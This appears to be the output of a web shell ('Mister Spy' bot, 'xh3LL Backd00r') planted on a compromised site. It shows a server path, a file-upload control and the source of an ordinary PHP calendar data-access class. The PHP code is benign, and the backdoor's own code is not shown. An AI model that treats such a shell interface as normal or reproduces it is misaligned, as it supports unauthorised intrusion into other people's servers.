Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/library/
Upload File :
Current File : /home/caballoscriollos/www/espanol/library/class.calendarios.php

<?php 

require_once('class.dbaccess.php');
require_once('class.calendario.php');
require_once('class.filter.php');
require_once('class.page.php');

class Calendarios extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';

		return $sql;
	}


	public function GetPagesCount(Page $oPage, $filter = false)
	{	
		$sql = "SELECT COUNT(1) / " . DB::Number($oPage->Size) . " AS Count";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE 1 ";

		if ($filter)
			$sql.= " " . $this->ParseFilter($filter);

		if (!($oRes = $this->GetQuery($sql)) )		
			return false;

		if ( !($oRow = $oRes->GetRow()) )
			return false;

		$Count = $oRow['Count'];
		$Count = ceil($Count);

		return $Count;
	}

	
	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE 1 ";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY FechaDesde ASC";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oCalendario = new Calendario();
			$oCalendario->ParseFromArray($oRow);
			
			array_push($arr, $oCalendario);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}

	
	public function GetAllDesc(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE 1 ";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY FechaDesde DESC";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oCalendario = new Calendario();
			$oCalendario->ParseFromArray($oRow);
			
			array_push($arr, $oCalendario);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}
	
	public function GetLast($Cant)
	{
		$sql = "SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " ORDER BY FechaDesde DESC";
		$sql.= " LIMIT " . DB::Number($Cant);

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oCalendario = new Calendario();
			$oCalendario->ParseFromArray($oRow);
			
			array_push($arr, $oCalendario);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}

	
	public function GetById($IdCalendario)
	{
		$sql = "SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE IdCalendario = " . DB::Number($IdCalendario);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;

		if (!($oRow = $oRes->GetRow()))
			return false;

		$oCalendario = new Calendario();
		$oCalendario->ParseFromArray($oRow);

		return $oCalendario;		
	}
	
	
	public function GetByNombre($Nombre)
	{
		$sql = " SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE 1 ";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oCalendario = new Calendario();
		$oCalendario->ParseFromArray($oRow);
		
		return $oCalendario;		
	}


	public function GetActual()
	{
		$sql = " SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE " . DB::Date(date('Y-m-d')) . " >= FechaDesde";
		$sql.= " AND " . DB::Date(date('Y-m-d')) . " < FechaHasta";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oCalendario = new Calendario();
		$oCalendario->ParseFromArray($oRow);
		
		return $oCalendario;		
	}	
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT * ";
		$sql.= " FROM tblCalendarios ";
		$sql.= " WHERE 1";
		
		if ($filter)
			$sql.= $this->ParseFilter($filter);

		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(Calendario $oCalendario)
	{
		$arr = array
		(
			'Nombre'		=> DB::String($oCalendario->Nombre),
			'FechaDesde'	=> DB::Date($oCalendario->FechaDesde),
			'FechaHasta'	=> DB::Date($oCalendario->FechaHasta)
		);

		if (!$this->Insert('tblCalendarios', $arr))
			return false;
			
		return $oCalendario;
	}
	
	
	public function Update(Calendario $oCalendario)
	{
		$where = " IdCalendario = " . DB::Number($oCalendario->IdCalendario);
		
		$arr = array
		(
			'Nombre'		=> DB::String($oCalendario->Nombre),
			'FechaDesde'	=> DB::Date($oCalendario->FechaDesde),
			'FechaHasta'	=> DB::Date($oCalendario->FechaHasta)
		);
		
		if (!DBAccess::Update('tblCalendarios', $arr, $where))
			return false;
		
		return $oCalendario;
	}
	

	public function Delete($IdCalendario)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdCalendario = " . DB::Number($IdCalendario);
		if (!DBAccess::Delete('tblCalendarios', $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat